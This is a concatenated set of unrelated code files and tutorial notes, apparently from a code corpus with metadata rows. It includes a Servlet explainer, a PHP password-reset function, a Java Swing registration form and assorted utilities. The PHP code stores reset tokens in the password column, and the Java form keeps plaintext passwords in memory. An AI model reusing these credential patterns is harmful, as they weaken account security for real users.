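        # Same rule as the PHP constructor: every field is required (None counts as missing).
        for key in REQUIRED_FIELDS:
            if data.get(key) is None:
                raise ValueError(f'Missing required field "{key}".')
        return cls(data["SampleCount"], data["Sum"], data["Minimum"], data["Maximum"])

    @classmethod
    def from_samples(cls, samples: Iterable[float]) -> "StatisticSetSketch":
        # Aggregate raw samples into the four statistics.
        values = [float(v) for v in samples]
        if not values:
            raise ValueError("at least one sample is required")
        return cls(float(len(values)), sum(values), min(values), max(values))

    def request_body(self) -> Dict[str, float]:
        # Same keys as requestBody() in the PHP class.
        return {
            "SampleCount": self.sample_count,
            "Sum": self.total,
            "Minimum": self.minimum,
            "Maximum": self.maximum,
        }


print(StatisticSetSketch.from_samples([1, 2, 3, 4]).request_body())
```

Sending these four aggregates instead of every sample keeps the request small. The average can still be recovered as `Sum / SampleCount`.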

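| PHP | UTF-8 | 510 | 2.65625 | 3 | [] | no_license |

```php
<?php
/**
 * Replaces a user's reset token with a new password. The token appears to be
 * stored in ifup_user_password until the user chooses a new password, and
 * the row is matched on that token.
 *
 * @return PDOStatement|false the executed statement, or false if an exception is thrown
 */
function update_new_password($token, $password) {
    try {
        global $bdd; // PDO connection created elsewhere
        $query = $bdd->prepare("UPDATE ifup_user SET ifup_user_password=:ifup_user_password WHERE ifup_user_password=:token");
        // $password is stored exactly as passed in, so it should already be hashed (e.g. with password_hash()).
        $query->bindParam(':ifup_user_password', $password, PDO::PARAM_STR);
        $query->bindParam(':token', $token, PDO::PARAM_STR);
        $query->execute();
        return $query;
    } catch (Exception $e) {
        return false;
    }
}
```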

| Markdown | UTF-8 | 8,821 | 2.578125 | 3 | [] | no_license |

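[toc]

## **What Is a Servlet?**

A Java Servlet is a program that runs on a web server or application server. It acts as a middle layer between requests coming from a web browser or other HTTP client and the databases or applications on the HTTP server.

==A Servlet is a program written in Java. It is based on the HTTP protocol, runs on the server side (for example in Tomcat), and is a Java class written according to the Servlet specification. Servlets handle the request/response exchange between client and server.==

With Servlets you can collect user input from web forms, present records from a database or other sources, and create web pages dynamically.

Java Servlets can usually achieve the same results as programs implemented with CGI (Common Gateway Interface). Compared with CGI, however, Servlets have the following advantages:

- Noticeably better performance.
- Servlets execute within the address space of the web server, so there is no need to create a separate process to handle each client request.
- Servlets are platform-independent because they are written in Java.
- The Java security manager on the server enforces a set of restrictions that protect the resources of the server machine, so Servlets are trusted.
- The full functionality of the Java class libraries is available to a Servlet. It can interact with applets, databases, or other software through sockets and RMI.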

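## Servlet Processing Flow

- The server creates the Servlet object, calls its init method, and then calls its service method.
- The container creates two objects, an HttpServletResponse and an HttpServletRequest.
- For an HTTP GET request doGet is called; for POST, doPost.
- Servlets handle requests on threads.

>Flow

1. The browser sends a GET request to the server (requesting ServletA).
2. The container on the server receives the URL and determines from it that this is a Servlet request. The container then creates two objects: a request object (HttpServletRequest) and a response object (HttpServletResponse).
3. Based on the URL, the container finds the target Servlet (ServletA in this example) and creates (or obtains) a thread A.
4. The container passes the request and response objects it just created to thread A.
5. The container calls the Servlet's service() method.
6. service() calls doGet() or doPost() according to the request type (this example is a GET request, so doGet() is called).
7. When doGet() finishes, the result is returned to the container.
8. Thread A is destroyed or returned to the thread pool.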

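## Differences Between forward and redirect

- forward: the request is forwarded inside the server. The server accesses the target URL directly and the client is unaware of it. The browser address does not change, and the same request object is used throughout the forward.
- redirect: the server tells the browser to go to another address (an HTTP redirect status such as 302 with a `Location` header). The browser fully navigates to the new URL (for example, baidu.com becomes www.baidu.com). This costs one extra network request.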

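## **The javax.servlet Package Contains 7 Interfaces, 3 Classes, and 2 Exception Classes**

These counts apply to early versions of the Servlet API. Later versions add more types, such as the `Filter` interface used in section 5 below.

Interfaces:

```
RequestDispatcher
Servlet
ServletConfig
ServletContext
ServletRequest
ServletResponse
SingleThreadModel
```

Classes:

```
GenericServlet
ServletInputStream
ServletOutputStream
```

Exception classes:

```
ServletException
UnavailableException
```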



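### **1. UML**

Image 1 above shows the Servlet UML class diagram.

From the diagram we can see:

- getParameter() gets the value of a parameter passed via POST/GET;
- getInitParameter() gets the Context initialization parameters set in Tomcat's server.xml;
- getAttribute() gets a data value from the object container; getRequestDispatcher() performs request forwarding.

1. The abstract class HttpServlet extends the abstract class GenericServlet. Its two key methods are doGet() and doPost().
2. GenericServlet implements the interfaces Servlet, ServletConfig, and Serializable.
3. MyServlet (a user-defined Servlet class) extends HttpServlet and overrides HttpServlet's doGet() and doPost() methods.

Note: any user-defined Servlet only needs to override doPost() and doGet() of the abstract class HttpServlet, like MyServlet in the diagram.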

### **2. How a Servlet Executes in the Container**

A Servlet can only run inside a container. There are many kinds of Servlet containers, such as Tomcat and WebLogic.

Analysis: the execution steps are the same as the flow listed above in the processing-flow section.

Notes:

1. In principle, each Servlet has only one instance in the container.
2. Each request corresponds to one thread.
3. Multiple threads can operate on the same Servlet at the same time (this is the root cause of Servlets not being thread-safe).
4. Once a thread finishes its task, it is destroyed or returned to the thread pool to wait for reuse.
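Note 3 has a direct practical consequence: every request thread shares the single Servlet instance, so any instance field is shared mutable state. The Python sketch below models this with a hypothetical `CounterServlet` served by several threads. It illustrates the concurrency issue only and does not use the Servlet API. The read-modify-write on `hits` is guarded by a lock, and the same reasoning applies to instance fields in a real Servlet:

```python
import threading


class CounterServlet:
    """Hypothetical stand-in for a servlet: one instance shared by all request threads."""

    def __init__(self):
        self.hits = 0  # instance field, visible to every request thread
        self._lock = threading.Lock()

    def service(self):
        # hits += 1 is a read-modify-write; without the lock, concurrent
        # requests could interleave and lose updates.
        with self._lock:
            self.hits += 1


def simulate_requests(servlet, threads=8, requests_per_thread=1000):
    """Run several threads against the same servlet instance and return its hit count."""

    def worker():
        for _ in range(requests_per_thread):
            servlet.service()

    pool = [threading.Thread(target=worker) for _ in range(threads)]
    for t in pool:
        t.start()
    for t in pool:
        t.join()
    return servlet.hits


servlet = CounterServlet()  # the "container" creates a single instance
print(simulate_requests(servlet))  # 8000
```

Keeping per-request data in local variables instead of fields avoids the need for locking altogether, because each thread then has its own copy.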

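### **3. The Role of Servlets in Java Web Applications**

**The following methods can be used in a Servlet to read request data, including HTTP headers**

These methods are available through the *HttpServletRequest* object:

```java
// 1) Returns an array containing all the Cookie objects the client sent with this request.
Cookie[] getCookies()

// 2) Returns the value of the named attribute as an Object, or null if no attribute of the given name exists.
Object getAttribute(String name)

// 3) Returns the value of the specified request header as a String. Cookie is also a kind of header.
String getHeader(String name)

// 4) Returns the value of a request parameter as a String, or null if the parameter does not exist.
String getParameter(String name)
```

Beyond that, a Servlet plays two roles in Java Web applications: **the page role and the controller role**.

Since dynamic page technologies such as JSP appeared, Servlets have focused more on the controller role, and JSP + Servlet + model form the basic three-tier architecture.

- (1) Page role

```java
protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
    request.setCharacterEncoding("UTF-8");
    response.setContentType("text/html;charset=utf-8");
    PrintWriter out = response.getWriter();
    out.println("Hello!Servlet.");
}
```

- (2) Controller role

JSP plays the page role and the Servlet plays the controller role. Together they form the basic MVC three-tier pattern.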



### **四、Servlet在容器中的生命周期**

servlet 的生命周期

servlet的生命周期是由servlet的容器来控制的,主要分为初始化、运行、销毁3个阶段,Servlet容器加载servlet,实例化后调用init()方法进行初始化,当请求到达时运行service()方法,根据对应请求调用doget或dopost方法,当服务器决定将实例销毁时调用destroy()方法(释放servlet占用的资源:关闭数据库连接、关闭文件输入输出流),在整个生命周期中,servlet的初始化和销毁只会发生一次,而service方法执行的次数则取决于servlet被客户端访问的次数。

下图为Servlet生命周期简要概图

分析:

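- Step 1: The container first ==loads== the Servlet class.

- Step 2: The container ==instantiates== the Servlet (its no-argument constructor runs).

- Step 3: The container calls ==init()==, which initializes the Servlet object when it is loaded. It runs only once in the Servlet's lifecycle, and always before service().

- Step 4: ==The container calls service(), the core method for handling client requests.== In an HttpServlet, requests are usually handled as GET or POST. The container constructs the ServletRequest and ServletResponse objects and passes them as arguments to service(), which passes them on to doGet() or doPost().

- Step 5: ==The container calls destroy()== when it stops and unloads the Servlet. This method is responsible for releasing resources; it takes the Servlet instance out of service rather than destroying any thread.

Initialization phase in detail: when the Servlet starts, the container reads the information in the configuration file (such as web.xml) and constructs the specified Servlet object. It then creates a ServletConfig object and calls init() with the ServletConfig as its argument.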
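The five steps can be traced with a small plain-Java simulation. This is a sketch, not the Servlet API. `TracingServlet` and `run()` are hypothetical, and a String stands in for the `ServletConfig` object a real container would pass to `init()`. Each lifecycle call is recorded, so the output shows that the constructor, init(), and destroy() run once, while service() runs once per request. A real container may also call service() from several threads at once; this sketch runs requests sequentially for clarity.

```java
import java.util.ArrayList;
import java.util.List;

public class LifecycleDemo {

    // Hypothetical servlet that records which lifecycle methods the container calls
    static class TracingServlet {
        final List<String> calls = new ArrayList<>();

        TracingServlet() { calls.add("constructor"); }                           // step 2: no-arg constructor
        void init(String config) { calls.add("init(" + config + ")"); }         // step 3: once, before service()
        void service(String request) { calls.add("service(" + request + ")"); } // step 4: once per request
        void destroy() { calls.add("destroy"); }                                 // step 5: once, on unload
    }

    // Hypothetical container driving one servlet through its whole lifecycle
    static List<String> run(List<String> requests) {
        TracingServlet servlet = new TracingServlet();  // steps 1-2: load the class and instantiate it
        servlet.init("ServletConfig");                   // a real container passes a ServletConfig object
        for (String r : requests) {
            servlet.service(r);
        }
        servlet.destroy();
        return servlet.calls;
    }

    public static void main(String[] args) {
        System.out.println(run(List.of("GET /a", "POST /a", "GET /b")));
        // [constructor, init(ServletConfig), service(GET /a), service(POST /a), service(GET /b), destroy]
    }
}
```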

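### **5. Servlet Filter Configuration Has Two Parts**

- Part 1 defines the filter in the web application. It uses the `<filter>` element, which has two required child elements: `<filter-name>` and `<filter-class>`.

- Part 2 defines the filter mapping. It uses the `<filter-mapping>` element, which can map a filter to one or more Servlets or JSP files. With `<url-pattern>`, a filter can also be mapped to any URL that matches a pattern.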
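The two parts might look like this in `WEB-INF/web.xml`, inside the `<web-app>` element. This is a minimal sketch: `encodingFilter`, `com.example.EncodingFilter`, and `MyServlet` are hypothetical names, and the two `<filter-mapping>` entries are alternatives rather than settings meant to be used together.

```xml
<!-- Part 1: define the filter (both child elements are required) -->
<filter>
    <filter-name>encodingFilter</filter-name>
    <filter-class>com.example.EncodingFilter</filter-class>
</filter>

<!-- Part 2, option A: apply the filter to every URL under /app/ -->
<filter-mapping>
    <filter-name>encodingFilter</filter-name>
    <url-pattern>/app/*</url-pattern>
</filter-mapping>

<!-- Part 2, option B: apply the filter to one named servlet instead -->
<filter-mapping>
    <filter-name>encodingFilter</filter-name>
    <servlet-name>MyServlet</servlet-name>
</filter-mapping>
```

The `<filter-name>` in each mapping must match the name declared in the `<filter>` definition.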

|

Java

|

UTF-8

| 138 | 1.765625 | 2 |

[] |

no_license

|

package com.example.mindtray.memo;

public class TextContent extends MemoContent {

public TextContent(String name) {

super(name);

}

}

|

JavaScript

|

UTF-8

| 366 | 2.59375 | 3 |

[] |

no_license

|

import { useEffect, useState } from 'react';

const useDebounce = (value, delay) => {

const [deValue, setDeValue] = useState(value);

useEffect(() => {

const timer = setTimeout(() => {

setDeValue(value);

}, delay);

return () => {

clearTimeout(timer);

};

}, [value, delay]);

return deValue;

};

export default useDebounce;

|

Java

|

UTF-8

| 2,026 | 2.015625 | 2 |

[] |

no_license

|

package com.lab516.service.sys;

import java.io.Serializable;

import java.util.List;

import javax.persistence.Query;

import org.springframework.cache.annotation.CacheEvict;

import org.springframework.cache.annotation.Cacheable;

import org.springframework.stereotype.Service;

import org.springframework.transaction.annotation.Transactional;

import com.lab516.base.BaseService;

import com.lab516.base.Consts;

import com.lab516.base.JPAQuery;

import com.lab516.base.Page;

import com.lab516.entity.sys.Config;

@Service

public class ConfigService extends BaseService<Config> {

private final String CACHE = "configCache";

@Transactional

@CacheEvict(value = CACHE, allEntries = true)

public Config insert(Config config) {

return super.insert(config);

}

@Transactional

@CacheEvict(value = CACHE, allEntries = true)

public Config update(Config config) {

return super.update(config);

}

@Transactional

@CacheEvict(value = CACHE, allEntries = true)

public void delete(Serializable id) {

super.delete(id);

}

@Cacheable(value = CACHE)

public String findValueByName(String cfg_name) {

String hql = "from Config where cfg_name = :cfg_name";

Query query = em.createQuery(hql);

query.setParameter("cfg_name", cfg_name);

List<Config> list = query.getResultList();

return list.isEmpty() ? null : list.get(0).getCfg_value();

}

public String findApkUrl() {

return findValueByName(Consts.CFG_NAME_APK_URL);

}

public String findApkVesion() {

return findValueByName(Consts.CFG_NAME_APK_VER);

}

public String findTipMessage() {

return findValueByName(Consts.CFG_TIP_MESSAGE);

}

public Page findPage(int page_no, int page_size, String cfg_id, String cfg_name, String cfg_value) {

JPAQuery query = createJPAQuery();

query.whereNullableContains("cfg_id", cfg_id);

query.whereNullableContains("cfg_name", cfg_name);

query.whereNullableContains("cfg_value", cfg_value);

return query.getPage(page_no, page_size);

}

}

|

Markdown

|

UTF-8

| 809 | 2.921875 | 3 |

[

"MIT"

] |

permissive

|

# plainjdbc

[](https://travis-ci.org/dohque/plainjdbc)

Small Scala library inspired by Spring JdbcTemplate to execute generated sql statements over plain jdbc.

This library has no dependencies and is extremely easy to use.

Add the PlainJDBC dependency to your build.sbt:

```scala

libraryDependencies += "com.dohque" %% "plainjdbc" % "0.1-SNAPSHOT"

```

Then start using it:

```scala

import javax.sql.DataSource

import scala.util.Try

case class Item(id: Int, name: String)

class ItemsRepository(val dataSource: DataSource) extends JdbcStore {

def findById(id: Int): Try[Option[Item]] =

query("select id, name from Items where id = ?", List(id)).map {

case head :: _ => Some(new Item(head("id"), head("name")))

case _ => None

}

}

```

Released under MIT license.

|

Java

|

UTF-8

| 13,173 | 2.171875 | 2 |

[] |

no_license

|

/*

* To change this license header, choose License Headers in Project Properties.

* To change this template file, choose Tools | Templates

* and open the template in the editor.

*/

package talabat.clone.project;

/**

*

* @author Aya

*/

import java.awt.Color;

import java.awt.Container;

import java.awt.Font;

import java.awt.event.ActionEvent;

import java.awt.event.MouseEvent;

import java.awt.event.MouseListener;

import java.util.regex.Matcher;

import java.util.regex.Pattern;

import javax.swing.ButtonGroup;

import javax.swing.JButton;

import javax.swing.JCheckBox;

import javax.swing.JComboBox;

import javax.swing.JFrame;

import static javax.swing.JFrame.EXIT_ON_CLOSE;

import javax.swing.JLabel;

import javax.swing.JOptionPane;

import javax.swing.JPasswordField;

import javax.swing.JRadioButton;

import javax.swing.JTextArea;

import javax.swing.JTextField;

import javax.swing.border.LineBorder;

//import static talabat.clone.Login_Coustomer.darkOrange;

/**

*

* @author Aya

*/

public class Register extends Name_X {

JLabel l6 =new JLabel (" Address: ");

JTextField Address=new JTextField();

JLabel l8 =new JLabel (" Confirm Password: ");

JPasswordField ConfirmPassword=new JPasswordField();

JLabel l7 =new JLabel (" Mobile: ");

JTextField Mobile=new JTextField();

JButton Submit=new JButton("Submit");

JButton Signin=new JButton("SIGNIN");

SubmitMouse Submitmouse=new SubmitMouse();

RestMouse restMouse =new RestMouse();

JLabel switch_to_owner=new JLabel("Switch to owner");

public static Data data=new Data();

public Register()

{

//updated 23/3/2021

Color col = new Color(255,90,0);

switch_to_owner.setForeground(col);

switch_to_owner.setBounds(165, 600, 150,100);

switch_to_owner.setFont(new java.awt.Font("Calibri", 0, 17));

switch_to_owner.setCursor(new java.awt.Cursor(java.awt.Cursor.HAND_CURSOR));

background.add(switch_to_owner);

switch_to_owner.addMouseListener(restMouse);

background1.setBounds(-170, 0, 780, 300);

l1.setBounds(50, 320, 100, 25);

background.add(l1);

UserName.setBounds(210, 320, 180, 25);

background.add(UserName);

l2.setBounds(50, 360, 100, 25);

background.add(l2);

Password.setBounds(210, 360, 180, 25);

background.add(Password);

l8.setBounds(20, 400, 180, 25);

background.add(l8);

ConfirmPassword.setBounds(210, 400, 180, 25);

background.add(ConfirmPassword);

l6.setBounds(10, 440, 180, 25);

background.add(l6);

Address.setBounds(210, 440, 180, 25);

background.add(Address);

l7.setBounds(10, 480, 180, 25);

background.add(l7);

Mobile.setBounds(210, 480, 180, 25);

background.add(Mobile);

Submit.setBounds(40, 560, 150, 34);

background.add(Submit);

Signin.setBounds(250, 560, 150, 34);

background.add(Signin);

l6.setFont(new java.awt.Font("Calibri", 0, 18));

l6.setForeground(new java.awt.Color(255, 90, 0));

l6.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);

l6.setBackground(Color.white);

l7.setFont(new java.awt.Font("Calibri", 0, 18));

l7.setForeground(new java.awt.Color(255, 90, 0));

l7.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);

l7.setBackground(Color.white);

l8.setFont(new java.awt.Font("Calibri", 0, 18));

l8.setForeground(new java.awt.Color(255, 90, 0));

l8.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);

l8.setBackground(Color.white);

Address.setForeground(new java.awt.Color(255, 90, 0));

Address.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);

Address.setFont(new java.awt.Font("Calibri", 0, 18));

Address.setBorder(new javax.swing.border.LineBorder(new java.awt.Color(255, 90, 0), 1, true));

ConfirmPassword.setForeground(new java.awt.Color(255, 90, 0));

ConfirmPassword.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);

ConfirmPassword.setFont(new java.awt.Font("Calibri", 0, 18));

ConfirmPassword.setBorder(new javax.swing.border.LineBorder(new java.awt.Color(255, 90, 0), 1, true));

Mobile.setForeground(new java.awt.Color(255, 90, 0));

Mobile.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);

Mobile.setFont(new java.awt.Font("Calibri", 0, 18));

Mobile.setBorder(new javax.swing.border.LineBorder(new java.awt.Color(255, 90, 0), 1, true));

Submit.setBackground(new java.awt.Color(255, 90, 0));

Submit.setForeground(Color.white);

Submit.setBorder(new javax.swing.border.LineBorder(new java.awt.Color(255, 90, 0), 1, true));

Submit.setFont(new java.awt.Font("Gadugi", 1, 18));

Submit.setCursor(new java.awt.Cursor(java.awt.Cursor.HAND_CURSOR));

//Submit.addMouseListener(signMouse);

Submit.addMouseListener(Submitmouse);

Signin.setBackground(new java.awt.Color(255, 90, 0));

Signin.setForeground(Color.white);

Signin.setBorder(new javax.swing.border.LineBorder(new java.awt.Color(255, 90, 0), 1, true));

Signin.setFont(new java.awt.Font("Gadugi", 1, 18));

Signin.setCursor(new java.awt.Cursor(java.awt.Cursor.HAND_CURSOR));

Signin.addMouseListener(restMouse);

}

public class SubmitMouse implements MouseListener

{

@Override

public void mouseClicked(MouseEvent e) {

if (e.getSource()==Submit)

{

String username=UserName.getText();

String password=new String(Password.getPassword());

int pass=Password.getPassword().length;

String confirmpassword=new String(ConfirmPassword.getPassword());

int confirm=ConfirmPassword.getText().length();

String address=Address.getText();

String Mobilenumber=Mobile.getText();

int mobileNumber=Mobile.getText().length();

if (username.isEmpty()||password.isEmpty()||confirmpassword.isEmpty()||address.isEmpty()||Mobilenumber.isEmpty())

{

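// showMessageDialog shows an OK-only message; showConfirmDialog would read ERROR_MESSAGE (0) as YES_NO_OPTION

JOptionPane.showMessageDialog(null,"You must fill in all fields","Error",JOptionPane.ERROR_MESSAGE);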

}

else if (!Pattern.matches("[a-zA-Z]+", username))

{

JOptionPane.showMessageDialog(null,"The name is invalid","Error",JOptionPane.ERROR_MESSAGE);

UserName.setText("");

}else if (pass<6)

{

JOptionPane.showMessageDialog(null,"Password must be at least 6 characters","Error",JOptionPane.ERROR_MESSAGE);

Password.setText("");

}else if (!(password.equals(confirmpassword)))

{

JOptionPane.showMessageDialog(null,"Password confirmation does not match","Error",JOptionPane.ERROR_MESSAGE);

Password.setText("");

ConfirmPassword.setText("");

}else if (!(mobileNumber==11))

{

JOptionPane.showMessageDialog(null,"Mobile number must contain 11 digits","Error",JOptionPane.ERROR_MESSAGE);

Mobile.setText("");

}

else if(!Pattern.matches("^[0-9]+$", Mobilenumber))

{

JOptionPane.showMessageDialog(null,"Mobile number must contain digits only","Error",JOptionPane.ERROR_MESSAGE);

Mobile.setText("");

}

else

{

//Data.data.numberOfUsers++;

/*Data.data.user_name[Data.data.numberOfUsers]=username;

Data.data.user_password[Data.data.numberOfUsers]=password;

Data.data.user_address[Data.data.numberOfUsers]=address;

Data.data.user_mobile_number[Data.data.numberOfUsers]=Mobilenumber;*/

checkData(address, username, Mobilenumber, password);

//restaurants_page obj=new restaurants_page();

Submit.setForeground(new Color(255,90,0));

Submit.setBackground(Color.white);

Submit.setBorder(new LineBorder(new Color(255,90,0),1,true));

}

}

}

@Override

public void mousePressed(MouseEvent e) {

}

@Override

public void mouseReleased(MouseEvent e) {

}

@Override

public void mouseEntered(MouseEvent e) {

if(e.getSource()==Submit)

{

Submit.setForeground(new Color(255,90,0));

Submit.setBackground(Color.white);

Submit.setBorder(new LineBorder(new Color(255,90,0),1,true));

}

}

@Override

public void mouseExited(MouseEvent e) {

if(e.getSource()==Submit)

{

Submit.setBackground(new Color(255,90,0));

Submit.setForeground(Color.white);

Submit.setBorder(new LineBorder(new Color(255,90,0),1,true));

}

}

}

public class RestMouse implements MouseListener

{

@Override

public void mouseClicked(MouseEvent e) {

if(e.getSource()==switch_to_owner)

{

LogIn_Owner2 o=new LogIn_Owner2();

dispose();

}

if (e.getSource()==Signin)

{

Login_Coustomer o=new Login_Coustomer();

dispose();

/*UserName.setText("");

Password.setText("");

ConfirmPassword.setText("");

Address.setText("");

Mobile.setText("");*/

}

}

@Override

public void mousePressed(MouseEvent e) {

}

@Override

public void mouseReleased(MouseEvent e) {

}

@Override

public void mouseEntered(MouseEvent e) {

if(e.getSource()==Signin)

{

Signin.setForeground(new Color(255,90,0));

Signin.setBackground(Color.white);

Signin.setBorder(new LineBorder(new Color(255,90,0),1,true));

}

}

@Override

public void mouseExited(MouseEvent e) {

if(e.getSource()==Signin)

{

Signin.setBackground(new Color(255,90,0));

Signin.setForeground(Color.white);

Signin.setBorder(new LineBorder(new Color(255,90,0),1,true));

}

}

}

public void checkData(String address,String UserName,String mobile,String pass)

{

boolean flag=false;

for (int i = 0; i <= Data.data.numberOfUsers; i++) {

if (UserName.equals(Data.data.user_name[i])&&address.equals(Data.data.user_address[i])&&mobile.equals(Data.data.user_mobile_number[i]))

{

JOptionPane.showMessageDialog(null,"This account already exists","Error",JOptionPane.ERROR_MESSAGE);

flag=false;

break;

}

else if (UserName.equals(Data.data.user_name[i]))

{

JOptionPane.showMessageDialog(null,"User name already exists","Error",JOptionPane.ERROR_MESSAGE);

flag=false;

break;

}

else if (mobile.equals(Data.data.user_mobile_number[i]))

{

JOptionPane.showMessageDialog(null,"Mobile number already exists","Error",JOptionPane.ERROR_MESSAGE);

flag=false;

break;

}

else if(!(UserName.equals(Data.data.user_name[i]))&&!(address.equals(Data.data.user_address[i]))&&!(mobile.equals(Data.data.user_mobile_number[i])))

{

flag=true;

}

}

if(flag==true)

{

JOptionPane.showMessageDialog(null,"Successfully registered.","Success",JOptionPane.INFORMATION_MESSAGE);

saveData(UserName,pass,address,mobile);

Login_Coustomer y=new Login_Coustomer();

dispose();

}

}

public void saveData(String name,String pass,String Address,String Mobile)

{

Data.data.numberOfUsers++;

Data.data.user_name[Data.data.numberOfUsers]=name;

Data.data.user_password[Data.data.numberOfUsers]=pass;

Data.data.user_address[Data.data.numberOfUsers]=Address;

Data.data.user_mobile_number[Data.data.numberOfUsers]=Mobile;

}

}

|

C#

|

UTF-8

| 2,584 | 2.640625 | 3 |

[] |

no_license

|

using System;

using System.Collections.Generic;

using System.Linq;

using System.Text;

using System.Threading.Tasks;

using System.Speech.Recognition;

using System.Speech.Synthesis;

using System.Speech.AudioFormat;

using System.Windows.Forms;

namespace domotica

{

public class SpeechToText

{

DictationGrammar dictation;

SpeechRecognitionEngine sr;

RichTextBox textBox;

string finalResult;

bool isCompleted = false;

public void getVoice()

{

try

{

textBox.Text = "";

dictation = new DictationGrammar();

sr = new SpeechRecognitionEngine();

sr.LoadGrammar(dictation);

sr.SetInputToDefaultAudioDevice();

sr.RecognizeAsync(RecognizeMode.Multiple);

//sr.SpeechHypothesized -= new EventHandler<SpeechHypothesizedEventArgs>(SpeechHypothesizing);

sr.SpeechRecognized -= new EventHandler<SpeechRecognizedEventArgs>(SpeechRecognized);

sr.EmulateRecognizeCompleted -= new EventHandler<EmulateRecognizeCompletedEventArgs>(EmulateRecognizeCompletedHandler);

//sr.SpeechHypothesized += new EventHandler<SpeechHypothesizedEventArgs>(SpeechHypothesizing);

sr.SpeechRecognized += new EventHandler<SpeechRecognizedEventArgs>(SpeechRecognized);

sr.EmulateRecognizeCompleted += new EventHandler<EmulateRecognizeCompletedEventArgs>(EmulateRecognizeCompletedHandler);

}

catch

{

}

}

public void SpeechRecognized(object sender, SpeechRecognizedEventArgs e)

{

try

{

finalResult = e.Result.Text;

textBox.Text += " " + finalResult;

}

catch (Exception ex)

{

MessageBox.Show(ex.Message);

}

}

private void EmulateRecognizeCompletedHandler(object sender, EmulateRecognizeCompletedEventArgs e)

{

try

{

isCompleted = true;

sr.UnloadGrammar(dictation);

sr.RecognizeAsyncStop();

textBox.Text += "\n\nCompleted. \n";

MessageBox.Show("Completed. ");

}

catch (Exception ex)

{

MessageBox.Show(ex.Message);

}

}

public SpeechToText( RichTextBox aTextBox )

{

textBox = aTextBox;

}

}

}

|

C#

|

UTF-8

| 633 | 2.6875 | 3 |

[] |

no_license

|

using System;

using System.Collections.Generic;

using System.Linq;

using System.Text;

namespace ClassLibrary1

{

public class Class1:IItf1,IItf2

{

void IItf1.Abc()

{

}

void IItf2.Abc()

{

}

private int aaa1;

}

class MyClasssub :Class1

{

private int a;

}

class MyClassSubSub : MyClasssub

{

private int c;

}

class MyClassSubSubSub : MyClassSubSub

{

private int b;

}

public interface IItf1

{

void Abc();

}

public interface IItf2

{

void Abc();

}

}

|

Java

|

UTF-8

| 723 | 2.34375 | 2 |

[] |

no_license

|

package cn.com.do1.mock.util;

import cn.com.do1.mock.model.TUserInfo;

import lombok.extern.slf4j.Slf4j;

import java.util.HashMap;

import java.util.Map;

/**

* @Author huangKun

* @Date 2021/3/24

**/

@Slf4j

public class LocalCacheUtil {

public static Map<String, TUserInfo> USER_CACHE = new HashMap<>();

static RedisUtil redisUtil = new RedisUtil();

static {

log.info(">>>>>>loading static block");

USER_CACHE.put("user1", (TUserInfo)redisUtil.getByKey("user1"));

}

public TUserInfo getUserCache(String userId){

if (null == USER_CACHE){

log.info(">>>>>>static block not load");

return null;

}

return USER_CACHE.get(userId);

}

}

|

JavaScript

|

UTF-8

| 406 | 3.09375 | 3 |

[

"MIT"

] |

permissive

|

/* Convert string to lower case.

*

* |Name |Desc |

* |------|------------------|

* |str |String to convert |

* |return|Lower cased string|

*/

/* example

* lowerCase('TEST'); // -> 'test'

*/

/* module

* env: all

*/

/* typescript

* export declare function lowerCase(str: string): string;

*/

_('toStr');

exports = function(str) {

return toStr(str).toLocaleLowerCase();

};

|

Swift

|

UTF-8

| 2,762 | 2.53125 | 3 |

[

"Apache-2.0"

] |

permissive

|

import UIKit

import main

@objc class ViewController: UIViewController, GameEngineCallbacks {

@IBOutlet weak var titleLabel: UILabel!

@IBOutlet weak var b11: UIButton!

@IBOutlet weak var b12: UIButton!

@IBOutlet weak var b13: UIButton!

@IBOutlet weak var b21: UIButton!

@IBOutlet weak var b22: UIButton!

@IBOutlet weak var b23: UIButton!

@IBOutlet weak var b31: UIButton!

@IBOutlet weak var b32: UIButton!

@IBOutlet weak var b33: UIButton!

@IBOutlet weak var winnerLabel: UILabel!

@IBOutlet weak var newGame: UIButton!

func clearUIField() {

// buttons

let arr = [b11, b12, b13, b21, b22, b23, b31, b32, b33]

for elem in arr {

elem?.setTitle("_", for: .normal)

}

winnerLabel.text = ""

}

func showZero(i: Int32, j: Int32) {

// buttons

let arr = [[b11, b12, b13], [b21, b22, b23], [b31, b32, b33]]

arr[Int(i)][Int(j)]?.setTitle("o", for: .normal)

}

func showWinner(message: String) {

winnerLabel.text = message

}

private var engine: GameEngine?

// Lifecycle

override func viewDidLoad() {

super.viewDidLoad()

engine = GameEngine(callbacks: self)

titleLabel.text = CommonKt.createApplicationScreenMessage()

engine?.startNewGame()

}

// Actions

@IBAction func onNewGameClick(_ sender: Any) {

engine?.startNewGame()

}

@IBAction func onB11Click(_ sender: UIButton) {

sender.setTitle("x", for: .normal)

engine?.fieldPressed(i: 0, j: 0)

}

@IBAction func onB12Click(_ sender: UIButton) {

sender.setTitle("x", for: .normal)

engine?.fieldPressed(i: 0, j: 1)

}

@IBAction func onB13Click(_ sender: UIButton) {

sender.setTitle("x", for: .normal)

engine?.fieldPressed(i: 0, j: 2)

}

@IBAction func onB21Click(_ sender: UIButton) {

sender.setTitle("x", for: .normal)

engine?.fieldPressed(i: 1, j: 0)

}

@IBAction func onB22Click(_ sender: UIButton) {

sender.setTitle("x", for: .normal)

engine?.fieldPressed(i: 1, j: 1)

}

@IBAction func onB23Click(_ sender: UIButton) {

sender.setTitle("x", for: .normal)

engine?.fieldPressed(i: 1, j: 2)

}

@IBAction func onB31Click(_ sender: UIButton) {

sender.setTitle("x", for: .normal)

engine?.fieldPressed(i: 2, j: 0)

}

@IBAction func onB32Click(_ sender: UIButton) {

sender.setTitle("x", for: .normal)

engine?.fieldPressed(i: 2, j: 1)

}

@IBAction func onB33Click(_ sender: UIButton) {

sender.setTitle("x", for: .normal)

engine?.fieldPressed(i: 2, j: 2)

}

}

|

JavaScript

|

UTF-8

| 10,157 | 3.0625 | 3 |

[

"MIT"

] |

permissive

|

/**

* Watcher for click, double-click, or long-click event for both mouse and touch

* @example

* import { clicked } from 'clicked'

*

* function handleClick()

* {

* console.log('I was clicked.')

* }

*

* const div = document.getElementById('clickme')

* const c = clicked(div, handleClick, { threshold: 15 })

*

* // change callback

* c.callback = () => console.log('different clicker')

*

* // destroy

* c.destroy()

*

* // using built-in querySelector

